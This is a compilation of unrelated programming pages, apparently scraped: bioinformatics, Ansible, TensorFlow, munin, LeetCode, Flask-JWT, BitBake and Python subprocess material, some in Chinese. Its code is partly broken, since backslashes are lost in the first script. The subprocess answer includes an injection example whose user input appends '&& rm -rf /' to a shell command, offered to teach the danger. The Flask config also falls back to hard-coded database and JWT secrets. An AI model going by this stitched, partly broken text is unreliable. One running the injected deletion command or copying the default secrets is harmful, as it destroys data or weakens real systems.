#For each HTseq file
for i in range(len(inputlist)):
#Open it
inputfile = open(inputlist[i], 'r')
#For each line
for line in inputfile:
#Determine the number of reads/transcripts for this gene
splitline = line.strip().split('t')
#Does it pass the threshold?
if int(splitline[1]) >= 5:
#If so, add it to list
if not splitline[0] in genelist:
genelist.append(splitline[0])
#Close the file
inputfile.close()
#Write out the list of sufficiently expressed genes
outputlist = open(sys.argv[9], 'w')
for gene in genelist:
outputlist.write(gene + 'n')
outputlist.close()
##Filter each of the HTseq files for only sufficiently expressed genes across our samples
#For each HTseq file
for i in range(len(inputlist)):
#Open it
inputfile = open(inputlist[i], 'r')
#Open an output 'filtered' file
outputfile = open(sys.argv[i+10], 'w')
#For each line
for line in inputfile:
#Determine the gene
splitline = line.strip().split('t')
#Is it in our list?
if splitline[0] in genelist:
#If so, write out the original line
outputfile.write(line)
#Close the files
inputfile.close()
outputfile.close()
Problem - When I am trying to execute the script I am getting the error "index list out of range"
I am also not sure where in the script I can feed the string of files as input?
Any help will be useful.
|
Method 1
Use
secure_ssl_keys_result.files|map(attribute='path')|list
It will return a list of paths:
['/etc/ssl../', '/etc/ssl/.../']
Your whole task would become:
- name: Secure ssl keys
file: path={{ item }} user=root group=root mode=600
with_items: secure_ssl_keys_result.files|map(attribute='path')|list
Beware that you can only select a single attribute, it is not possible to use attribute=['path', 'mode'] or similar.
Method 2
I thought of using extract to be able to fetch multiple keys (because it is sometimes necessary to have a second key for a when condition), but didn't manage to do it, as I would need to map the list of dicts, then map the list of keys over the specific dict, which doesn't seem possible, as map only accepts a function name but not a function definition/chained functions. I would be grateful for an suggestion here!
A great idea from the comments (Thanks, Uditha Desilva!):
- name: Secure ssl keys file: path={{ item.0 }} mode=600 owner={{ item.1 }}
with_together:
- secure_ssl_keys_result.files|map(attribute='path')|list
- secure_ssl_keys_result.files|map(attribute='uid')|list
Method 3
Alternatively, a custom filter like this could be used (that's what I did before I found out about map):
from ansible import errors
import re
def cleandict(items, keepkeys):
try:
newitems = []
if not isinstance(items, list):
items = [items]
if not isinstance(keepkeys, list):
keepkeys = [keepkeys]
for dictionary in items:
newdictionary = {}
for keepkey in keepkeys:
newdictionary[keepkey] = dictionary.get(keepkey)
newitems.append(newdictionary)
return newitems
except Exception, e:
raise errors.AnsibleFilterError('split plugin error: %s' % str(e) )
#raise errors.AnsibleFilterError('split plugin error: %s, string=%s' % str(e),str(items) )
class FilterModule(object):
''' A filter to split a string into a list. '''
def filters(self):
return {
'cleandict' : cleandict
}
ansible.cfg:
filter_plugins = ~/.ansible/plugins/filter_plugins/:/usr/share/ansible_plugins/filter_plugins
|
फ़रवरी 28, 2019 — Guest post by MIT 6.S191 Introduction to Deep LearningMIT 6.S191: Introduction to Deep Learning is an introductory course offered formally at MIT and open-sourced on its course website. The class consists of a series of foundational lectures on the fundamentals of neural networks and their applications to sequence modeling, computer vision, generative models, and reinforcement learning.MIT’s offi…
MIT Introduction to Deep Learning lectures and labs are are open-source and free for everyone!
MIT’s Introduction to Deep Learning consists of technical lectures on state-of-the-art algorithms as well as applied software labs in TensorFlow.
All lectures are available online for free — click here to watch!
Gain practical experience with in-depth TensorFlow software labs.
def debiasing_loss_func(x, x_pred, y_label, y_logit, z_mu, z_logsigma, kl_weight=0.005):
# compute loss components
reconstruction_loss = tf.reduce_mean(tf.keras.losses.MSE(x,x_pred), axis=(1,2))
classification_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_label, logits=y_logit)
kl_loss = 0.5 * tf.reduce_sum(tf.exp(z_logsigma) + tf.square(z_mu) - 1.0 - z_logsigma, axis=1)
# propogate debiasing gradients only on relevant datapoints
gradient_mask = tf.cast(tf.equal(y_label, 1), tf.float32)
# define the total debiasing loss as a combination of the three losses
vae_loss = kl_weight * kl_loss + reconstruction_loss
total_loss = tf.reduce_mean(classification_loss + gradient_mask * vae_loss)
return total_loss
Importantly, this approach can be applied
फ़रवरी 28, 2019 — Guest post by MIT 6.S191 Introduction to Deep LearningMIT 6.S191: Introduction to Deep Learning is an introductory course offered formally at MIT and open-sourced on its course website. The class consists of a series of foundational lectures on the fundamentals of neural networks and their applications to sequence modeling, computer vision, generative models, and reinforcement learning.MIT’s offi…
|
ntp_packets
Sadly there is no documentation for this plugin.
#!/usr/bin/env python3 # -*- python -*- # This plugin graphs the rate of sent, received, ignored, and dropped # NTP packets for an ntpd process. Similarly to the if_ plugins, # received packets are graphed as negative values, and sent packets # are graphed as positive values. Ignored and dropped packets are # graphed as positive values. # # The values are retrieved using ntpq or ntpdc, depending on the # version of the NTP distribution. # # Symlink this plugin into the node's plugins directory (like # /etc/munin/plugins). # # Copyright © 2016 Kenyon Ralph <kenyon@kenyonralph.com> # # This program is free software. It comes without any warranty, to the # extent permitted by applicable law. You can redistribute it and/or # modify it under the terms of the Do What The Fuck You Want To Public # License, Version 2, as published by Sam Hocevar. See # http://www.wtfpl.net/ for more details. # # The latest version of this plugin can be found in the munin contrib # repository at https://github.com/munin-monitoring/contrib. Issues # with this plugin may be reported there. Patches accepted through the # normal github process of forking the repository and submitting a # pull request with your commits. import os import subprocess import sys if len(sys.argv) == 2 and sys.argv[1] == 'config': print('graph_title NTP traffic') print('graph_vlabel Packets/${graph_period} received(-)/sent(+)') print('graph_info This graph shows the packet rates of this ntpd. Bad means packets received ' 'with bad length or format. Authfailed means packets for which authentication failed.') print('graph_category time') print('received.label Received') print('received.type DERIVE') print('received.graph no') print('received.min 0') print('sent.label Rx/Tx') print('sent.type DERIVE') print('sent.negative received') print('sent.min 0') print('dropped.label Dropped') print('dropped.type DERIVE') print('dropped.min 0') print('ignored.label Ignored') print('ignored.type DERIVE') print('ignored.min 0') print('bad.label Bad') print('bad.type DERIVE') print('bad.min 0') print('authfail.label Authfailed') print('authfail.type DERIVE') print('authfail.min 0') print('declined.label Declined') print('declined.type DERIVE') print('declined.min 0') print('restricted.label Restricted') print('restricted.type DERIVE') print('restricted.min 0') print('kod.label KoD responses') print('kod.type DERIVE') print('kod.min 0') sys.exit(0) os.environ['PATH'] = '/usr/local/sbin:/usr/local/bin:' + os.environ['PATH'] # Assuming that the ntpd version is the same as the ntpq or ntpdc # version. This is how a proper install should be. version = subprocess.check_output(['ntpq', '-c', 'version'], universal_newlines=True).split()[1][0:5].replace('.', '') if int(version) >= 427: cmd = 'ntpq' else: cmd = 'ntpdc' stats = dict() stats_output = subprocess.check_output([cmd, '-c', 'iostats', '-c', 'sysstats'], universal_newlines=True).splitlines() # Split the cmd output into key/value pairs # Lines that can't be split into 2 individual elements by delimiter ':' will be skipped for line in stats_output: if len(line.split(':')) == 2: stats[line.split(':')[0]] = int(line.split(':')[1]) print('received.value ' + str(stats['received packets'])) print('sent.value ' + str(stats['packets sent'])) print('dropped.value ' + str(stats['dropped packets'])) print('ignored.value ' + str(stats['ignored packets'])) print('bad.value ' + str(stats['bad length or format'])) print('authfail.value ' + str(stats['authentication failed'])) print('declined.value ' + str(stats['declined'])) print('restricted.value ' + str(stats['restricted'])) print('kod.value ' + str(stats['KoD responses'])) sys.exit(0)
|
Description
Given a binary tree, determine if it is a valid binary search tree (BST).
Assume a BST is defined as follows:
The left subtree of a node contains only nodes with keys less thanthe node’s key.
The right subtree of a node contains only nodes with keys greater thanthe node’s key.
Both the left and right subtrees must also be binary search trees.
Example 1:
2 / \ 1 3Input:[2,1,3]Output:true
Example 2:
5 / \ 1 4 / \ 3 6Input:[5,1,4,null,null,3,6]Output:falseExplanation:The root node's value is 5 but its right child's value is 4.
Explanation
The idea is to compare the node value with its upper and lower limits if they are available. Then one repeats the same step recursively for left and right subtrees.
Python Solution
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isValidBST(self, root: TreeNode) -> bool:
return self.validBST_helper(root, sys.maxsize, -sys.maxsize)
def validBST_helper(self, root, max_value, min_value):
if root == None:
return True
if root.val >= max_value or root.val <= min_value:
return False
return self.validBST_helper(root.left, root.val, min_value) and self.validBST_helper(root.right, max_value, root.val)
Time complexity: O(N).
Space complexity: O(N).
|
软硬件环境
视频看这里
此处是youtube的播放链接,需要科学上网。喜欢我的视频,请记得订阅我的频道,打开旁边的小铃铛,点赞并分享,感谢您的支持。
前言
在web开发中,Client与Server的交互都是通过HTTP协议发送请求和接收响应,但是因为HTTP协议是无状态的(stateless),也就是说Client和Server都不会记得先前的状态,Client每次发送request都会被视为是独立的,Server无法确定Client是否已经发送过认证请求。
本文分享基于Token即令牌的认证。在flask中,使用的扩展是flask-jwt-extended。
什么是JWT
JWT的原名是JSON Web Token,它是一种协定,就是把JSON结构的信息进行加密后变成Token传递给Client端,然后客户端透过这个Token来与服务器进行交互。简单来说就是:使用者在登录或是验证过身份后,后端会在返回请求中附上JWT Token,未来使用者发送Request时携带此Token,就表示通过验证,而沒有携带JWT Token的使用者就会被拒绝访问,需要重新登录或重新验证身份。
安装扩展
flask-jwt-extended是JWT的一个实现,有了它,使得我们在开发基于flask框架的web应用时能够更加方便地实现基于Token的认证过程。首先需要安装扩展
pip install flask-jwt-extended
完整代码示例
这次示例,我们会用上之前介绍flask-sqlalchemy、flask-cors、flask-restful等扩展,编写一个相对完整的前后端分离的web后端系统,它具备如下功能
可以实现用户登录
用户登录信息的数据库存储
基于Token的前后端交互、RESTful API
跨域访问
先来看看整个项目的文件目录结构
首先我们准备下数据库,使用的是开源数据库mysql,创建数据库flask
通过scripts目录下的dbInitialize.py脚本文件创建初始数据库表并插入一条数据,用户名是admin@gmail.com,密码是字符串123456经过sha256加密后的数据,默认用户是激活状态
user表的结构是这样的
class User(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(45), nullable=False, unique=True)
password = db.Column(db.String(128), nullable=False)
active = db.Column(db.Boolean, default=True, nullable=False)
def __init__(self, username=None, password=None, active=True):
self.username = username
self.password = password
self.active = True
重点来看看用户登录部分的后端实现,还是RESTful API,这里提供一个POST方法,接收客户端发送过来的JSON数据,解析后得到用户名及加密后的密码,如果用户名存在于我们的数据库中且密码相符,调用flask_jwt_extended的create_access_token方法生成对应的token,注意到create_access_token的参数部分,我们传递的是username。flask_jwt_extended还提供了方法get_jwt_identity,可以从token中获取到username,这点在实际项目中非常有用。
class Login(Resource):
def __init__(self, **kwargs):
self.logger = kwargs.get('logger')
def post(self):
code = None
message = None
token = None
userid = None
args = reqparse.RequestParser() \
.add_argument('username', type=str, location='json', required=True, help="用户名不能为空") \
.add_argument("password", type=str, location='json', required=True, help="密码不能为空") \
.parse_args()
flag_user_exist, flag_password_correct, user = User.authenticate(args['username'], args['password'])
if not flag_user_exist:
code = 201
message = "user not exist"
elif not flag_password_correct:
code = 202
message = "wrong password"
else:
code = 200
message = "success"
token = create_access_token(identity=user.username)
userid = user.id
return jsonify({
"code": code,
"message": message,
"token": token,
"userid": userid
})
我们通过postman来模拟客户端的行为
可以看到,postman拿到了服务器发送过来的token值,保存这个值,后面的所有接口都需要带上这个token。接下来看看获取所有用户信息的接口
class Users(Resource):
def __init__(self, **kwargs):
self.logger = kwargs.get('logger')
@jwt_required
def get(self):
users_list = []
users = User.get_users()
for user in users:
users_list.append({"userid": user.id, "username": user.username})
return jsonify({
"code": 200,
"message": "success",
"users": users_list
})
注意到上面的get方法有个装饰器@jwt_required,意思就是说这个接口是需要验证token的,所以,客户端在调用这个接口的时候就需要带上token,否则会报Missing Authorization Header的错误
正确的做法是这样的,在Headers添加字段
"Authorization: Bearer $ACCESS_TOKEN"
这里面的Bearer是token的一种类型,还有另一个类型是Mac Token,这是固定写法
定制Token过期的返回信息
flask-jwt-extended在token过期后,有自己默认的出错信息,如果不满意,可以自己定制出错信息,使用装饰器@jwt.expired_token_loader
@jwt.expired_token_loader
def expired_token_callback():
return jsonify({
'code': 201,
'message': "token expired"
})
Signature has expired处理
在程序运行时,无意中出现了Signature has expired的异常
File "/usr/local/lib/python3.5/site-packages/flask/app.py", line 1639, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python3.5/site-packages/flask/app.py", line 1625, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/usr/local/lib/python3.5/site-packages/flask_restful/__init__.py", line 477, in wrapper
resp = resource(*args, **kwargs)
File "/usr/local/lib/python3.5/site-packages/flask/views.py", line 84, in view
return self.dispatch_request(*args, **kwargs)
File "/usr/local/lib/python3.5/site-packages/flask_restful/__init__.py", line 587, in dispatch_request
resp = meth(*args, **kwargs)
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 222, in wrapper
jwt_data = _decode_jwt_from_request(type='access')
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 204, in _decode_jwt_from_request
return _decode_jwt_from_headers()
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 176, in _decode_jwt_from_headers
return _decode_jwt(token, secret, algorithm)
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 136, in _decode_jwt
data = jwt.decode(token, secret, algorithm=algorithm)
File "/usr/local/lib/python3.5/site-packages/jwt/api_jwt.py", line 75, in decode
self._validate_claims(payload, merged_options, **kwargs)
File "/usr/local/lib/python3.5/site-packages/jwt/api_jwt.py", line 104, in _validate_claims
self._validate_exp(payload, now, leeway)
File "/usr/local/lib/python3.5/site-packages/jwt/api_jwt.py", line 149, in _validate_exp
raise ExpiredSignatureError('Signature has expired')
jwt.exceptions.ExpiredSignatureError: Signature has expired
google一番,看到官方的issue里有讨论这个问题,结论是在flask-jwt-extended配置中添加PROPAGATE_EXCEPTIONS = True,有兴趣的话,请查看参考资料里的链接。关于工程的所有配置信息,便于统一管理,我们集中在app/config.py中书写
import os
class Config:
# flask
DEBUG = os.environ.get('FLASK_DEBUG') or True
# database
SQLALCHEMY_DATABASE_URI = os.environ.get('SQLALCHEMY_DATABASE_URI') or 'mysql+pymysql://root:toor@localhost/test'
SQLALCHEMY_TRACK_MODIFICATIONS = True
# jwt
JWT_SECRET_KEY = os.environ.get('JWT_SECRET_KEY') or 'jwt-key'
JWT_COOKIE_CSRF_PROTECT = True
JWT_CSRF_CHECK_FORM = True
JWT_ACCESS_TOKEN_EXPIRES = os.environ.get('JWT_ACCESS_TOKEN_EXPIRES') or 3600
PROPAGATE_EXCEPTIONS = True
在生产环境中,可以通过对应的环境变量来获取配置,能够比较方便地区分调试和生产环境
|
blob: d2dba256c43bc4ece1532c60529cf86bb0f64c44 (
plain
)
#
# BitBake ToasterUI Implementation
# based on (No)TTY UI Implementation by Richard Purdie
#
# Handling output to TTYs or files (no TTY)
#
# Copyright (C) 2006-2012 Richard Purdie
# Copyright (C) 2013 Intel Corporation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from __future__ import division
try:
import bb
except RuntimeError as exc:
sys.exit(str(exc))
from bb.ui import uihelper
from bb.ui.buildinfohelper import BuildInfoHelper
import bb.msg
import copy
import fcntl
import logging
import os
import progressbar
import signal
import struct
import sys
import time
import xmlrpclib
featureSet = [bb.cooker.CookerFeatures.HOB_EXTRA_CACHES, bb.cooker.CookerFeatures.SEND_DEPENDS_TREE, bb.cooker.CookerFeatures.BASEDATASTORE_TRACKING]
logger = logging.getLogger("BitBake")
interactive = sys.stdout.isatty()
def _log_settings_from_server(server):
# Get values of variables which control our output
includelogs, error = server.runCommand(["getVariable", "BBINCLUDELOGS"])
if error:
logger.error("Unable to get the value of BBINCLUDELOGS variable: %s" % error)
raise BaseException(error)
loglines, error = server.runCommand(["getVariable", "BBINCLUDELOGS_LINES"])
if error:
logger.error("Unable to get the value of BBINCLUDELOGS_LINES variable: %s" % error)
raise BaseException(error)
return includelogs, loglines
def main(server, eventHandler, params ):
includelogs, loglines = _log_settings_from_server(server)
# verify and warn
build_history_enabled = True
inheritlist, error = server.runCommand(["getVariable", "INHERIT"])
if not "buildhistory" in inheritlist.split(" "):
logger.warn("buildhistory is not enabled. Please enable INHERIT += \"buildhistory\" to see image details.")
build_history_enabled = False
helper = uihelper.BBUIHelper()
console = logging.StreamHandler(sys.stdout)
format_str = "%(levelname)s: %(message)s"
format = bb.msg.BBLogFormatter(format_str)
bb.msg.addDefaultlogFilter(console)
console.setFormatter(format)
logger.addHandler(console)
if not params.observe_only:
logger.error("ToasterUI can only work in observer mode")
return
main.shutdown = 0
interrupted = False
return_value = 0
errors = 0
warnings = 0
taskfailures = []
buildinfohelper = BuildInfoHelper(server, build_history_enabled)
buildinfohelper.store_layer_info()
while True:
try:
event = eventHandler.waitEvent(0.25)
if event is None:
if main.shutdown > 0:
break
continue
helper.eventHandler(event)
if isinstance(event, bb.event.BuildStarted):
buildinfohelper.store_started_build(event)
if isinstance(event, (bb.build.TaskStarted, bb.build.TaskSucceeded, bb.build.TaskFailedSilent)):
buildinfohelper.update_and_store_task(event)
continue
if isinstance(event, bb.event.LogExecTTY):
logger.warn(event.msg)
continue
if isinstance(event, logging.LogRecord):
buildinfohelper.store_log_event(event)
if event.levelno >= format.ERROR:
errors = errors + 1
return_value = 1
elif event.levelno == format.WARNING:
warnings = warnings + 1
# For "normal" logging conditions, don't show note logs from tasks
# but do show them if the user has changed the default log level to
# include verbose/debug messages
if event.taskpid != 0 and event.levelno <= format.NOTE:
continue
logger.handle(event)
continue
if isinstance(event, bb.build.TaskFailed):
buildinfohelper.update_and_store_task(event)
return_value = 1
logfile = event.logfile
if logfile and os.path.exists(logfile):
bb.error("Logfile of failure stored in: %s" % logfile)
continue
# these events are unprocessed now, but may be used in the future to log
# timing and error informations from the parsing phase in Toaster
if isinstance(event, bb.event.ParseStarted):
continue
if isinstance(event, bb.event.ParseProgress):
continue
if isinstance(event, bb.event.ParseCompleted):
continue
if isinstance(event, bb.event.CacheLoadStarted):
continue
if isinstance(event, bb.event.CacheLoadProgress):
continue
if isinstance(event, bb.event.CacheLoadCompleted):
continue
if isinstance(event, bb.event.MultipleProviders):
continue
if isinstance(event, bb.event.NoProvider):
return_value = 1
errors = errors + 1
if event._runtime:
r = "R"
else:
r = ""
if event._dependees:
text = "Nothing %sPROVIDES '%s' (but %s %sDEPENDS on or otherwise requires it)" % (r, event._item, ", ".join(event._dependees), r)
else:
text = "Nothing %sPROVIDES '%s'" % (r, event._item)
logger.error(text)
if event._reasons:
for reason in event._reasons:
logger.error("%s", reason)
text += reason
buildinfohelper.store_log_error(text)
continue
if isinstance(event, bb.event.ConfigParsed):
continue
if isinstance(event, bb.event.RecipeParsed):
continue
# end of saved events
if isinstance(event, (bb.runqueue.sceneQueueTaskStarted, bb.runqueue.runQueueTaskStarted, bb.runqueue.runQueueTaskSkipped)):
buildinfohelper.store_started_task(event)
continue
if isinstance(event, bb.runqueue.runQueueTaskCompleted):
buildinfohelper.update_and_store_task(event)
continue
if isinstance(event, bb.runqueue.runQueueTaskFailed):
buildinfohelper.update_and_store_task(event)
taskfailures.append(event.taskstring)
logger.error("Task %s (%s) failed with exit code '%s'",
event.taskid, event.taskstring, event.exitcode)
continue
if isinstance(event, (bb.runqueue.sceneQueueTaskCompleted, bb.runqueue.sceneQueueTaskFailed)):
buildinfohelper.update_and_store_task(event)
continue
if isinstance(event, (bb.event.TreeDataPreparationStarted, bb.event.TreeDataPreparationCompleted)):
continue
if isinstance(event, (bb.event.BuildCompleted)):
buildinfohelper.read_target_package_dep_data(event)
buildinfohelper.update_build_information(event, errors, warnings, taskfailures)
continue
if isinstance(event, (bb.command.CommandCompleted,
bb.command.CommandFailed,
bb.command.CommandExit)):
buildinfohelper.update_build_information(event, errors, warnings, taskfailures)
# we start a new build info
errors = 0
warnings = 0
taskfailures = []
buildinfohelper = BuildInfoHelper(server, build_history_enabled)
buildinfohelper.store_layer_info()
continue
if isinstance(event, bb.event.MetadataEvent):
if event.type == "SinglePackageInfo":
buildinfohelper.store_build_package_information(event)
continue
# ignore
if isinstance(event, (bb.event.BuildBase,
bb.event.StampUpdate,
bb.event.RecipePreFinalise,
bb.runqueue.runQueueEvent,
bb.runqueue.runQueueExitWait,
bb.event.OperationProgress,
bb.command.CommandFailed,
bb.command.CommandExit,
bb.command.CommandCompleted,
bb.cooker.CookerExit)):
continue
if isinstance(event, bb.event.DepTreeGenerated):
buildinfohelper.store_dependency_information(event)
continue
logger.error("Unknown event: %s", event)
except EnvironmentError as ioerror:
# ignore interrupted io
if ioerror.args[0] == 4:
pass
except KeyboardInterrupt:
main.shutdown = 1
pass
except Exception as e:
logger.error(e)
import traceback
traceback.print_exc()
pass
if interrupted:
if return_value == 0:
return_value = 1
return return_value
|
Semantically Modeling of Narrative Events
For storytelling purposes, I am developing an application that allows a user to navigate between a collection of narrative events. Each event has an accompanying 3D environment with participants and items that can be interacted with. Interactions include displaying more information about the selected object, superimposing the selected object over the user’s view of the real world (that is, Augmented Reality or AR), or visually outlining all of the objects in a 3D environment that have been tagged with a specific tag.
The semantic model that I have developed for this purpose is loosly based on something that journalists will be very familiar with: the Five Ws. What that means is that the semantic model describes what is happening, when and where the event is taking place, who the event’s participants are and why the event is taking place (which, in turn, is basically a collection of prior events).
class Event(Entity): def __init__( self, identifier: str, action_property: str, rank: int = 0, name: str = "Undefined", ): super().__init__(identifier, instance_of="event", name=name) self.rank = rank # What? self.action_property = action_property self.events: Dict[str, Event] = {} # Who? self.participants: Dict[str, Participant] = {} self.things: Dict[str, Thing] = {} # When? self.when: TimeInterval = None # Where? self.where: Place = None # Why? self.why: Dict[str, Event] = {}
Events are recursive meaning that they can be described in terms of other events (that is, sub-events) making it possible to represent events in a very fine-grained manner. What’s more, sub-events are to events, what events are to a narrative; they keep moving the narrative forward, each at their own level.
In addition, two types of connection between events are currently supported: the events-centric temporal connection and the spatial connection. The temporal connection establishes a cause-effect relationship between events while the spatial connection is used to establish a more physical from-to relationship.
The events-centric model described above is modeled on top of the topic maps model that TopicDB provides. This approach of using the topic maps model to model another model (that is, meta-modeling) exemplifies the descriptive power and flexibility of topic maps. If you want to get a better understanding of this approach, I recommend taking a look at StoryDB, the library that underlies this project.
StoryDB is still a bit rough around the edges, so expect it to be refined as I make progress in this project. Nonetheless, its current state is sufficient for the application that I mentioned at the beginning of this post. I will make the application available within the next couple of weeks so that those that are interested can play around with it.
|
python - system参数 - subprocess popen返回值
在Python中调用外部命令 (20)
如何在Python脚本中调用外部命令(就像我在Unix shell或Windows命令提示符下键入它一样)?
在Python中调用外部命令
简单,使用subprocess.run ,它返回一个CompletedProcess对象:
>>> import subprocess
>>> completed_process = subprocess.run('python --version')
Python 3.6.1 :: Anaconda 4.4.0 (64-bit)
>>> completed_process
CompletedProcess(args='python --version', returncode=0)
为什么?
从Python 3.5开始,文档推荐使用subprocess.run :
调用子进程的推荐方法是对它可以处理的所有用例使用run()函数。 对于更高级的用例,可以直接使用底层的Popen接口。
这是一个最简单的使用示例 - 它完全按照要求:
>>> import subprocess
>>> completed_process = subprocess.run('python --version')
Python 3.6.1 :: Anaconda 4.4.0 (64-bit)
>>> completed_process
CompletedProcess(args='python --version', returncode=0)
run等待命令成功完成,然后返回CompletedProcess对象。 它可能会引发TimeoutExpired (如果你给它一个timeout=参数)或CalledProcessError (如果它失败并且你传递check=True )。
正如您可能从上面的示例中推断的那样,默认情况下,stdout和stderr都会通过管道传输到您自己的stdout和stderr。
我们可以检查返回的对象并查看给出的命令和返回码:
>>> completed_process.args'python --version'>>> completed_process.returncode0
捕获输出
如果要捕获输出,可以将subprocess.PIPE传递给相应的stderr或stdout :
>>> cp = subprocess.run('python --version',
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
>>> cp.stderr
b'Python 3.6.1 :: Anaconda 4.4.0 (64-bit)\r\n'
>>> cp.stdout
b''
(我觉得有趣且有点违反直觉,版本信息被放到stderr而不是stdout。)
传递命令列表
人们可以轻松地从手动提供命令字符串(如问题建议)到提供以编程方式构建的字符串。 不要以编程方式构建字符串。 这是一个潜在的安全问题。 假设您不信任输入,那就更好了。
>>> import textwrap
>>> args = ['python', textwrap.__file__]
>>> cp = subprocess.run(args, stdout=subprocess.PIPE)
>>> cp.stdout
b'Hello there.\r\n This is indented.\r\n'
注意,只有args应该在位置上传递。
完整签名
这是源代码中的实际签名,如help(run) :
def run(*popenargs, input=None, timeout=None, check=False, **kwargs):
popenargs和kwargs被赋予popenargs构造函数。 input可以是一串字节(或unicode,如果指定encoding或universal_newlines=True ),它将被传送到子进程的stdin。
该文档描述了timeout=和check=True比我更好:
timeout参数传递给Popen.communicate()。 如果超时到期,子进程将被终止并等待。 子进程终止后,将重新引发TimeoutExpired异常。
如果check为true,并且进程以非零退出代码退出,则将引发CalledProcessError异常。 该异常的属性包含参数,退出代码以及stdout和stderr(如果它们被捕获)。
这个例子对于check=True比我想出的更好:
>>> subprocess.run("exit 1", shell=True, check=True)
Traceback (most recent call last):
...
subprocess.CalledProcessError: Command 'exit 1' returned non-zero exit status 1
扩展签名
这是一个扩展的签名,如文档中所示:
subprocess.run(args, *, stdin=None, input=None, stdout=None, stderr=None,
shell=False, cwd=None, timeout=None, check=False, encoding=None,
errors=None)
请注意,这表示只应按位置传递args列表。 因此将剩余的参数作为关键字参数传递。
POPEN
什么时候使用Popen ? 我很难根据论据单独找到用例。 但是,直接使用Popen可以访问其方法,包括poll ,'send_signal','terminate'和'wait'。
这是源中给出的Popen签名。 我认为这是对信息的最精确封装(与help(Popen)相反):
def __init__(self, args, bufsize=-1, executable=None,
stdin=None, stdout=None, stderr=None,
preexec_fn=None, close_fds=_PLATFORM_DEFAULT_CLOSE_FDS,
shell=False, cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0,
restore_signals=True, start_new_session=False,
pass_fds=(), *, encoding=None, errors=None):
但更多信息是Popen文档 :
subprocess.Popen(args, bufsize=-1, executable=None, stdin=None,
stdout=None, stderr=None, preexec_fn=None, close_fds=True,
shell=False, cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0, restore_signals=True,
start_new_session=False, pass_fds=(), *, encoding=None, errors=None)
在新进程中执行子程序。 在POSIX上,该类使用os.execvp() - 类似行为来执行子程序。 在Windows上,该类使用Windows CreateProcess()函数。 Popen的论点如下。
了解Popen的剩余文档将留给读者练习。
使用标准库
使用子进程模块 (Python 3):
import subprocess
subprocess.run(['ls', '-l'])
这是推荐的标准方式。 但是,更复杂的任务(管道,输出,输入等)构造和写入可能很繁琐。
关于Python版本的注意事项:如果您仍在使用Python 2,则subprocess.call以类似的方式工作。
import shlex
import subprocess
subprocess.run(shlex.split('ls -l'))
具有外部依赖性
如果您不介意外部依赖项,请使用plumbum :
from plumbum.cmd import ifconfig
print(ifconfig['wlan0']())
它是最好的subprocess包装器。 它是跨平台的,即它适用于Windows和类Unix系统。 通过pip install plumbum 。
另一个受欢迎的图书馆是:
from sh import ifconfig
print(ifconfig('wlan0'))
但是, sh删除了Windows支持,所以它不像过去那样棒。 通过pip install sh 。
......或者是一个非常简单的命令:
import os
os.system('cat testfile')
os.system不允许您存储结果,因此如果您想将结果存储在某些列表或os.system中。
以下是调用外部程序的方法及其优缺点的摘要:
os.system("some_command with args")将命令和参数传递给系统的shell。 这很好,因为您实际上可以以这种方式一次运行多个命令并设置管道和输入/输出重定向。 例如:
os.system("some_command < input_file | another_command > output_file")
但是,虽然这很方便,但您必须手动处理shell字符的转义,例如空格等。另一方面,这也允许您运行只是shell命令而不是外部程序的命令。 请参阅文档 。
stream = os.popen("some_command with args")将执行与os.system相同的操作,除了它为您提供了一个类似文件的对象,您可以使用它来访问该进程的标准输入/输出。 还有3种其他的popen变体,它们对i / o的处理方式略有不同。 如果您将所有内容都作为字符串传递,那么您的命令将传递给shell; 如果你将它们作为列表传递,那么你不必担心逃避任何事情。 请参阅文档 。
subprocess模块的Popen类。 这是为了取代os.popen但由于功能如此全面而具有稍微复杂的缺点。 例如,你会说:
print subprocess.Popen("echo Hello World", shell=True, stdout=subprocess.PIPE).stdout.read()
代替:
print os.popen("echo Hello World").read()
但是在一个统一的类而不是4个不同的popen函数中拥有所有选项是很好的。 请参阅文档 。
subprocess模块的call函数。 这基本上就像Popen类一样,并且接受所有相同的参数,但它只是等待命令完成并为您提供返回代码。 例如:
return_code = subprocess.call("echo Hello World", shell=True)
请参阅文档 。
os模块还具有C程序中的所有fork / exec / spawn函数,但我不建议直接使用它们。
subprocess模块可能应该是你使用的。
最后请注意,对于所有将shell执行的最终命令作为字符串传递的方法,您负责转义它。 如果您传递的字符串的任何部分无法完全受信任,则会产生严重的安全隐患 。 例如,如果用户正在输入字符串的某些/任何部分。 如果您不确定,请仅将这些方法与常量一起使用。 为了给您一些暗示,请考虑以下代码:
print subprocess.Popen("echo %s " % user_input, stdout=PIPE).stdout.read()
并想象用户输入“我的妈妈不爱我&& rm -rf /”。
你可以使用Popen,然后你可以检查程序的状态:
from subprocess import Popen
proc = Popen(['ls', '-l'])
if proc.poll() is None:
proc.kill()
检查subprocess.Popen 。
如果您不想测试返回值,则subprocess.check_call很方便。 它会对任何错误抛出异常。
如果您需要调用命令的输出,则可以使用subprocess.check_output(Python 2.7+)。
>>> subprocess.check_output(["ls", "-l", "/dev/null"])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
另请注意shell参数。
如果shell为
